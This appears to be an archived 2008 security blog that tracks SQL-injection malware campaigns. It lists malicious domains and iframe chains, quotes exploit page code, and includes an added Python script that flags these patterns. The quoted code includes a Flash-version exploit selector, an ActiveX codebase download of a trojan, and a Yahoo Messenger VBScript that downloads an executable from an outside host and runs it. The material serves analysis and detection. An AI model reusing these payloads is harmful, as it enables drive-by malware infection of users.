Archive for August, 2008

www2.1000ylc.cn/csrss/w.js

Posted in sql injection on August 23, 2008 by s3cu

A new SQL-injected domain.

Strangely, the domain is currently not resolvable.

additional domains with hhr2ehght.com

Posted in sql injection on August 18, 2008 by s3cu

Below are additional domains resolving to the same IP address as hhr2ehght.com, reported previously.

  • ggqvehght.com
  • eyigehght.com
  • bbjvehght.com

www.bluexzz.cn/g.js

Posted in sql injection on August 12, 2008 by s3cu

Another SQL-injected domain.

/g.js redirects to /g.js?ckoafx=59812, which contains iframes pointing to 14.htm and 456.htm.

Content of 14.htm is a VBScript as follows:

hhr2ehght.com/cgi-bin/index.cgi?mentat

Posted in sql injection on August 8, 2008 by s3cu

Another malicious domain. Other domains resolving to the same IP addresses were also observed.


other domains of jjmaobuduo.3322.org

Posted in sql injection on August 8, 2008 by s3cu

These domains all resolve to the same IP address, which is used for the injection.


jjmaobuduo.3322.org/csrss/w.js

Posted in sql injection on August 6, 2008 by s3cu

A new round of attacks has started.
w.js contains an iframe whose src is http://www.plgou.com/csrss/htm.htm.
htm.htm in turn contains the following iframes:

  • <iframe src=flash.htm width=100 height=0></iframe>
  • <iframe src=06014.html width=100 height=0></iframe>
  • <iframe src=yahoo.htm width=100 height=0></iframe>
  • <iframe src=office.htm width=100 height=0></iframe>
  • <iframe src=ksx.htm width=100 height=0></iframe>

flash.htm loads i1.html if the browser is MSIE, otherwise f2.html (presumably for Firefox). Depending on the Flash Player version, the matching Flash exploit file is retrieved:

// flash.htm: select the exploit SWF by the installed Flash Player 9 revision
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
  document.getElementById('flashversion').innerHTML="";
  if(version['rev']==115){var so=new SWFObject("./i115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}
  else if(version['rev']==64){var so=new SWFObject("./i64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}
  else if(version['rev']==47){var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}
  else if(version['rev']==45){var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}
  else if(version['rev']==28){var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}
  else if(version['rev']==16){var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}
  else if(version['rev']>=124){
    // revision 124 and later: no SWF is served, only the placeholder is cleared
    if(document.getElementById){document.getElementById('flashversion').innerHTML=""}
  }
}
document.write("")

Interesting content for ksx.htm:
<object classid="clsid:7E0CDEE7-DC80-4F37-9410-790BB5E9270E" codebase="http://www.plgou.com/csrss/rondll32.exe#version=1,0,0,1" width="800" height="191"></object>

The codebase attribute points straight at rondll32.exe; this is an infrequently used CLSID for downloading the trojan.

office.htm contains the Snapshot Viewer exploit.

yahoo.htm exploits Yahoo Messenger to download the trojan:

<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
' fetch the trojan through the control's GetFile method and write it to disk
test.GetFile "http://www.plgou.com/csrss/rondll32.exe","c:\\msyahoo.exe",5,1,"tiany"
' then execute the dropped file
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "c:\\msyahoo.exe"
</script>
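As an added example (not code from this blog), the Python script below statically triages captured copies of the pages described in this post: hidden zero-height iframes, object tags whose codebase names an executable, the Flash-revision-to-SWF branching, and the GetFile/WshShell.Run drop-and-run pair. The sample inputs are constructed from the snippets quoted above and the function names are my own.

```python
"""Static triage of drive-by landing pages: flags the four patterns this post describes."""
import re

# Constructed samples, trimmed from the snippets quoted in the post above.
HTM_HTM = """<iframe src=flash.htm width=100 height=0></iframe>
<iframe src=yahoo.htm width=100 height=0></iframe>"""
FLASH_JS = """if(version['major']==9){if(version['rev']==115){var so=new SWFObject("./i115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==64){var so=new SWFObject("./i64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']>=124){document.getElementById('flashversion').innerHTML=""}}"""
KSX_HTM = '<object classid="clsid:7E0CDEE7-DC80-4F37-9410-790BB5E9270E" codebase="http://www.plgou.com/csrss/rondll32.exe#version=1,0,0,1" width="800" height="191"></object>'
YAHOO_HTM = r"""<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "http://www.plgou.com/csrss/rondll32.exe","c:\\msyahoo.exe",5,1,"tiany"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "c:\\msyahoo.exe"
</script>"""

def hidden_iframes(html):
    """src of every iframe with height=0: the invisible loaders chained from htm.htm."""
    found = []
    for tag in re.findall(r'<iframe\b[^>]*>', html, re.I):
        src = re.search(r'\bsrc=["\']?([^\s"\'>]+)', tag, re.I)
        if src and re.search(r'\bheight=["\']?0\b', tag, re.I):
            found.append(src.group(1))
    return found

def activex_objects(html):
    """(CLSID, codebase) per <object>; a codebase naming an .exe is the ksx.htm download trick."""
    out = []
    for tag in re.findall(r'<object\b[^>]*>', html, re.I):
        clsid = re.search(r'classid=["\']clsid:([0-9a-f-]+)', tag, re.I)
        codebase = re.search(r'codebase=["\']([^"\']+)', tag, re.I)
        if clsid:
            out.append((clsid.group(1).upper(), codebase.group(1) if codebase else None))
    return out

def exe_via_codebase(html):
    """CLSIDs whose codebase points at an executable rather than a CAB/OCX: flag for blocking."""
    return [c for c, cb in activex_objects(html) if cb and re.search(r'\.exe(#|$)', cb, re.I)]

def swf_by_revision(js):
    """Map each Flash Player revision tested in flash.htm to the SWF that branch loads."""
    pat = r'version\[\'rev\'\]==(\d+)\)\{[^}]*?SWFObject\("([^"]+)"'
    return {int(rev): swf for rev, swf in re.findall(pat, js)}

def vbscript_drop_and_run(html):
    """(download URL, local path, command) from a GetFile + WshShell.Run pair, else None."""
    get = re.search(r'\.GetFile\s+"([^"]+)"\s*,\s*"([^"]+)"', html, re.I)
    run = re.search(r'WshShell\.Run\s*"([^"]+)"', html, re.I)
    return (get.group(1), get.group(2), run.group(1)) if get and run else None

if __name__ == "__main__":
    print("hidden iframes:", hidden_iframes(HTM_HTM))
    print("swf by revision:", swf_by_revision(FLASH_JS))
    print("exe via codebase:", exe_via_codebase(KSX_HTM))
    print("drop and run:", vbscript_drop_and_run(YAHOO_HTM))
```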

www.worldofwarcrokft.com/1/Office1.htm

Posted in sql injection on August 2, 2008 by s3cu

As reported in the previous blog post, this file seems to be flagged by Symantec as a new attack vector.

Content of Office1.htm is as follows: